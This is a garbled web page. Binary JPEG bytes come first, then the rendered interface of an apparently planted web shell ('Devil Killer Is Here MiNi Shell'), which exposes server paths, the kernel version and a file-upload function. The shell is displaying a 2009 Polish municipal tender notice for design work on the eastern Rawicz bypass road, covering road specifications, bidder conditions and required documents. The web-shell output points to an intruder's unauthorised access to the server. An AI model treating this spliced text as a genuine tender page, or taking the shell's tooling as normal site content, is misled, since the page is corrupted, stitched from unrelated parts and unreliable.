JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/6428-N-2009.html

<p class="kh_header"><b>Rawicz: Opracowanie dokumentacji projektowej na budowę wschodniej obwodnicy Rawicza wrz z infrastrukturą towarzyszącą</b><br>
<b>Numer ogłoszenia: 6428 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na budowę wschodniej obwodnicy Rawicza wrz z infrastrukturą towarzyszącą.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dla budowy drogi  wraz z infrastrukturą  towarzyszącą, uzyskanie w imieniu  i na rzecz ZAMAWIAJĄCEGO  wszelkich wymaganych prawem opinii, uzgodnień i decyzji niezbędnych do realizacji  inwestycji w tym  uzyskanie prawomocnej decyzji         o pozwoleniu na budowę dla zadania inwestycyjnego pn. Budowa wschodniej  obwodnicy Rawicza. 

Zamówienie obejmuje opracowanie w oparciu o obowiązujące przepisy prawa pełnej wielobranżowej dokumentacji budowlanej - projektowej i kosztorysowej na budowę drogi wraz z niezbędną infrastrukturą jej towarzyszącą tj. opracowanie  projektów: 
a)	budowy drogi,
b)	budowy odwodnienia (kanalizacja deszczowa)
c)	budowy kanalizacji sanitarnej
d)	budowy sieci wodociągowej 
e)	budowy oświetlenia ulicznego, 
f)	oznakowania  docelowego po wybudowaniu drogi,

wraz  z uzyskaniem prawomocnych pozwoleń niezbędnych do realizacji całości inwestycji .  
  
2. Opracowana przez Wykonawcę dokumentacja projektowa  będzie stanowić  podstawę do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których jest wymagane pozwolenie na budowę z oparciu o Rozporządzenie  Ministra Infrastruktury z dnia  2 września 2004 roku  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202 poz. 2072  ze zmianami). 

3. Wybrany Wykonawca będzie zobowiązany do współpracy  z Pracownią Projektową zajmującą się sporządzeniem miejscowego  planu zagospodarowania przestrzennego, na obszarze objętym pod budowę obwodnicy,  położonym w Rawiczu i Szymanowie, na wschód od ulicy 1000-Lecia, pomiędzy linią kolejową relacji Rawicz - Miejska Górka, drogą powiatowa nr 5484 P, ulicą 1000-Lecia w Rawiczu wraz z terenami tych dróg.

4. Zamówienie obejmuje: 
Przedmiot opracowania należy podzielić w następujący sposób 

Zakres I	- budowa drogi,
Zakres II	- budowa kanalizacji deszczowej,
zakres III -  budowa oświetlenia ulicznego, 
Zakres IV  - budowa kanalizacji sanitarnej,
Zakres  V  - budowa sieci wodociągowej,

5.Dane wyjściowe  do projektowania: 

BRANŻA DROGOWA I KANALIZACJA DESZCZOWA  - ZAKRES I i II 
Przy projektowaniu drogi i kanalizacji deszczowej należy uwzględnić parametry zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych , jakim powinny odpowiadać  drogi i ich usytuowanie (Dz. U Nr 43 poz. 430).

Parametry techniczne drogi :  
a) długość drogi - 2,1 km,
b) pas drogowy o szerokości 17 - 20 m,
b) obciążenie ruchem - KR 3
c) klasa techniczna drogi  -  Z 
d) jezdnia z masy bitumicznej, o szerokości 7,00 m. ściek dwustronny, uliczny z dwóch rzędów z kostki brukowej - betonowej Holland, 
e) po wschodniej stronie drogi przewidzieć chodnik wraz ze ścieżką rowerową z kostki brukowej betonowej,
f) po zachodniej stronie drogi przewidzieć chodnik przyległy do granicy pasa drogowego z kostki brukowej betonowej, 
g) krawężnik betonowy, wibroprasowany,  tam, gdzie to konieczne krawężnik łukowy, obniżenia na przejściach dla pieszych,
h) miejsca włączenia projektowanej drogi do dróg:  krajowej nr 36 (ul. Sarnowska) i powiatowej nr 5484 P (ul. Kamińskiego) należy zaprojektować w oparciu o warunki, które projektant zobowiązany jest uzyskać w Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddział w Poznaniu - dla drogi krajowej, oraz w Powiatowym Zarządzie Dróg w Rawiczu - dla drogi powiatowej.
i) skrzyżowanie projektowanej drogi z torami kolejowymi w jednym poziomie, należy zaprojektować w oparciu o warunki, które projektant zobowiązany jest uzyskać w PKP Polskie Linie Kolejowe S.A. Zakład Linii Kolejowych w Ostrowie Wielkopolskim.
j) w miejscach włączenia do projektowanej drogi dróg gminnych i wewnętrznych  należy przewidzieć wyprowadzenie w te drogi na minimalnym odcinku - do końca łuku kołowego + 5,00 m.
k) do istniejących posesji należy przewidzieć zjazdy publiczne lub indywidualne,
l) nieutwardzone elementy pasa drogowego należy zagospodarować jako tereny zielone - trawniki, 
m) wynikłe w trakcie projektowania kolizje z urządzeniami infrastruktury technicznej projektant wykona w ramach usług  uzupełniających.
n) wpusty uliczne w ilości zapewniającej prawidłowe odwodnienie drogi, podłączone do zaprojektowanego kolektora deszczowego przykanalikami z rur PCV o średnicy 200 mm,  
o) kanalizacja deszczowa na całej długości drogi ma również zapewnić możliwość odwodnienia przyległych terenów o pow. około 150 ha, zgodnie z warunkami, które projektant zobowiązany jest uzyskać w Zakładzie Wodociągów i Kanalizacji w Rawiczu,
p) przebudowa 3 przepustów drogowych. Jeżeli w trakcie ustalania przebiegu projektowanej drogi wyniknie potrzeba wykonania opracowań na więcej niż 3 przepusty, wykonane zostaną one w ramach robót uzupełniających, a jeżeli zmniejszeniu wartość zamówienia ulegnie zmniejszeniu.
q) podział około 30 działek, z czego 16 na dwie i 14 na 3 działki. Jeżeli w trakcie ustalania przebiegu projektowanej drogi ilość działek wymagających podziału  ulegnie zwiększeniu, podziały tych działek wykonane zostaną w ramach robót uzupełniających, a jeżeli zmniejszeniu wartość zamówienia ulegnie zmniejszeniu. Obowiązek wykonania i poniesienia  kosztów projektów podziałów ciąży na Wykonawcy. 

Projektowana droga kategorii gminnej łączyć będzie drogę krajową nr 36 (ul. Sarnowska)  z drogą powiatową nr 5484P (ul. Kamińskiego) droga Rawicz - Jutrosin. Projekt ma umożliwiać poprzez zaprojektowane skrzyżowań  włączenie do projektowanej drogi ulic: Kamienistej, Ceglanej, Armii Krajowej, 1000 Lecia i nowoprojektowanych . Do zagospodarowania jest pas drogowy o długości około 2 100 m i   szerokości 17 - 20 m. W pasie drogowym powinna znaleźć się jezdnia , obustronne chodniki w tym  jeden po stronie wschodniej jako chodnik ze ścieżką rowerową.   Droga ma posiadać klasę Z i być zaprojektowana pod obciążenie ruchem -  KR 3. W pasie drogowym należy zaprojektować niezbędną infrastrukturę tj. kanalizacja deszczowa, oświetlenie uliczne , kanalizację sanitarną i sieć wodociągową.  

Planowany przebieg drogi  zaznaczono kolorem żółtym na załączniku graficznym stanowiący element SIWZ.      

Na Wykonawcy ciąży również obowiązek przygotowania wniosku wraz ze sporządzeniem studium wykonalności oraz niezbędnymi załącznikami wymagającymi dodatkowego opracowania w celu ubiegania się o dofinansowanie z funduszy unijnych.  

Ponadto Zamawiający - Gmina Rawicz oczekuje, że wykonawca projektu w najlepszy z możliwych sposobów zaprojektuje organizację ruchu na projektowanej drodze oraz  zmiany w organizacji ruchu na włączeniach do drogi krajowej, powiatowej jak również z pozostałymi drogami. 

BRANŻA - OŚWIETLENIE ULICZNE  - ZAKRES III

Na przedmiotowym odcinku należy zaprojektować oświetlenie uliczne (linia, słupy, szafka) w pasie zieleni pomiędzy jezdnią a chodnikiem ze ścieżką rowerową (strona wschodnia).
Proponuje się zaprojektować słupy stalowe ocynkowane 10 m z podwójnym wysięgnikiem:
- do oprawy parkowej na wysokości 4 m oświetlającej chodnik  
- z wysięgnikiem do oprawy oświetlającej jezdnię

Przy określaniu warunków przyłączenia do sieci należy uwzględnić to, że oświetlenie  po wybudowaniu zostanie na majątku Gminy Rawicz.

BRANŻA - KANALIZACJA SANITARNA I SIEĆ WODOCIĄGOWA  - ZAKRES IV  i  V

W pasie drogowym należy zaprojektować również następujące urządzenia:
- Sieć kanalizacji sanitarnej,
- Sieć wodociągową,
Należy przewidzieć wyprowadzenie w/w sieci w istniejące i projektowane drogi łączące się z projektowaną drogą.

Zakres IV i V należy zaprojektować w oparciu o warunki, które projektant zobowiązany jest  uzyskać w Zakładzie Wodociągów i Kanalizacji w Rawiczu. 
-  długość drogi wzdłuż której mają być zaprojektowane sieci 2,1km,
-  sieci zlokalizować po wschodniej stronie drogi (za projektowanym chodnikiem  wraz ze ścieżką rowerowa  - pas zieleni)

Zakres IV
- kanalizacja sanitarna O 315mm,  włączenie do ks dn  400 zlokalizowanej na terenie  PKP,  lub w inne miejsce wskazane przez Zakład Wodociągów i  Kanalizacji w Rawiczu, studnie  co 50 mb wraz z  odgałęzieniem sieci na zachodnią stronę pasa drogowego zakończone studnią w chodniku oraz odgałęzienia do dróg bocznych (jeżeli te odcinki będą dłuższe to zaprojektować dodatkowe studnie) .
-  uzgodnienie przebiegu sieci po terenie kolejowym PKP Polskie Linie Kolejowe S.A. Zakład Linii Kolejowych 
   w Ostrowie Wielkopolskim.
- w przypadku wystąpienia konieczności zaprojektowania przepompowni Wykonawca w ramach usług uzupełniających zaprojektuje przepompownie wraz możliwością zdalnego przekazu parametrów technologicznych przepompowni ścieków  do istniejącego monitoringu SUW Załęcze. Monitoring powinien zapewniać stały nadzór pracy przepompowni.

Zakres IV 
-sieć wodociągowa O 160mm, włączenie do istniejącej sieci w ul. Sarnowskiej, ul. Armii Krajowej i ul. Kaminskiego, zaprojektować wraz z odgałęzieniem co 100 m na zachodnią stronę  pasa drogowego oraz odgałęzienia na skrzyżowaniach  zakończone zasuwą.

Opracowana przez Wykonawcę dokumentacja projektowa i kosztorysowa winna  umożliwiać realizację inwestycji w częściach. Proponuje się jako etap I odcinek od ul. Kamińskiego ( droga Rawicz - Jutrosin) do włączenia z  ul. Armii Krajowej oraz etap II  od Armii Krajowej do włączenia z ul. Sarnowską (droga krajowa nr 36).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.35.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> WYKONAWCA  przystępujący do przetargu jest obowiązany wnieść wadium w wysokości 15.000,00 PLN.    
Wadium  musi obejmować cały okres związania ofertą i może być wniesione:  w pieniądzu,  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach  bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
W przypadku wyboru wpłaty wadium  w pieniądzu należy je wpłacić przelewem na rachunek bankowy Urzędu Miejskiego Gminy Rawicz  w Kredyt Bank S.A. Odział Rawicz 43 1500 2110 1215 1002 0897 0000. 
Przy wnoszeniu wadium wykonawca winien powołać się na nazwę zadania podaną przez  Zamawiającego.  
Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium.         
O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i godzina wpływu środków na rachunek Zamawiającego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się WYKONAWCY, którzy spełniają niżej określone warunki:

WARUNKI  DO SPEŁNIENIA PRZEZ WYKONAWCÓW

  1) - spełniają warunki określone w art. 22 ust. 1 ustawy PZP i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy tj.

a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 ustawy);
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  (art. 22 ust. 1 pkt 2 ustawy); 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 ustawy);
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (art. 22 ust. 1 pkt 4  i art. 24 ustawy);

2) są  ubezpieczeni  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,   

3) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie świadczyli  
usługi projektowe związane z opracowaniem  projektu budowlanego związanego z budową drogi publicznej zbiorczej zgodnie z definicją drogi zbiorczej wynikającą z przepisów w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie ( Rozporządzenia Ministra Transportu i Gospodarki Morskiej  z dnia 02.03. 1999 r. 
Warunek ten zostanie uznany za spełniony jeżeli Wykonawca udokumentuje, że zaprojektował w nie więcej niż  4  zamówieniach budowę dróg publicznych zbiorczych o łącznej długości  2.100 m.  
 
4) akceptują bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy. 

2. ZAMAWIAJĄCY dokona oceny spełnienia warunków na podstawie złożonych wraz z ofertą oświadczeń, dokumentów, wykazów szczegółowo określonych w niniejszej SIWZ. Ocena spełnienia tych warunków dokonana zostanie wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w załączonych dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż postawione warunki WYKONAWCA spełnia. 

3. Nie spełnienie chociażby jednego z w/wym. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a oferta będzie podlegała odrzuceniu.

4. WYKONAWCY wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/wym. 
warunki. Przy ocenie spełnienia warunków udziału w postępowaniu,  warunki i wielkości wykazane przez podmioty występujące wspólnie będą brane pod uwagę łącznie.  Nie spełnienie powyższego wymagania spowoduje wykluczenie 
WYKONAWCY - konsorcjum. 	
Doświadczenia podwykonawców ,ich potencjał oraz uprawnienia nie będą brane pod uwagę przy ustalaniu czy WYKONAWCA spełnia warunki udziału..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków, o których mowa w rozdziale VIII SIWZ  ZAMAWIAJĄCY żąda do złożenia przez WYKONAWCĘ, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez WYKONAWCĘ, następujących dokumentów:

w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności o którym mowa w art. 22 ust. 1 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - 
Prawo zamówień publicznych (warunek nr 1): 

1) Oświadczenie WYKONAWCY, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 2);

2) Oświadczenie WYKONAWCY, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania  potencjału technicznego i osób zdolnych do wykonania zamówienia (załącznik nr 2); 

3)Oświadczenie WYKONAWCY, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (załącznik nr 2); 

4) Oświadczenie WYKONAWCY, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (załącznik nr 3);

5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 
w celu potwierdzenia,  że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (warunek nr 2 )  : 

6) aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że WYKONAWCA jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, 

w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia w celu potwierdzenia warunku nr 3 wykonawca składa : 
7) Wykaz wykonanych usług  w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający spełnienie warunku nr 3 opisanego przez Zamawiającego wyżej. 
Załączony do oferty Wykaz  opracowany w oparciu o załączony do SIWZ  druk (załącznik nr 6)  musi potwierdzać spełnienie opisanego warunku. Do wykazu należy również załączyć dokumenty potwierdzające, że usługi  te zostały wykonane należycie.

w celu potwierdzenia, że  Wykonawca akceptuje bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy (warunek nr 4) 

12) Oświadczenie Wykonawcy, że zapoznał się ze SIWZ a w szczególności z warunkami opisu przedmiotu zamówienia i akceptuje bez zastrzeżeń warunki zamówienia określone w Specyfikacji oraz w projekcie umowy, oraz zdobył konieczne informacje do przygotowania oferty (załącznik nr 4) 

Ponadto dokumentami wymaganymi przez Zamawiającego do złożenia przez Wykonawcę są:

13) Oferta przetargowa
14) Kalkulacja ceny ofertowej 
15) WYKONAWCY, którzy zamierzają powierzyć część zamówienia podwykonawcom zobowiązani są w treści oferty lub w załączniku do oferty (załącznik nr 5) wskazać tą część zamówienia, których wykonanie powierzy podwykonawcom.
16) Pełnomocnictwo do reprezentowania o ile ofertę składa pełnomocnik,
17) dowód wpłaty wadium 

2. Jeżeli WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane:
1) pkt 2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,    
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;

2) pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

Dokumenty, o których mowa w ppkt 1 lit. a i c oraz ppkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ppkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę

3.Zasady składania oferty przez podmioty występujące wspólnie i sposób komunikowania się :
a) podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia,
b) pełnomocnik konsorcjum pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp. 
c) każdy z wykonawców działających wspólnie powinien złożyć wszelkie dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. Wymagane oświadczenia i dokumenty wskazane w pkt 1 ppkt  4-6 tego rozdziału powinny być złożone przez każdy podmiot osobno, natomiast pozostałe oświadczenia i dokumenty mogą być złożone razem.    

4. Wykonawcy zobowiązani są do przedstawienia dokumentów - oświadczeń o których wyżej mowa zawierających stwierdzenia zgodne z faktami i stanem prawnym istniejącym w chwili ich składania (aktualne dane).
   Dokumenty o których wyżej mowa mogą ( za wyjątkiem pełnomocnictwa, - rozdział XIV pkt 7 SIWZ)  potwierdzające spełnienie wymaganych warunków mogą być złożone w formie oryginału lub kserokopii  poświadczonej za zgodność z oryginałem przez Wykonawcę.  
   Zakres i forma ww. dokumentów musi być zgodna z Rozporządzeniem Prezesa Rady Ministrów z dn. 19.05.06r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane    (Dz. U. Nr 87 poz. 605 ze zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
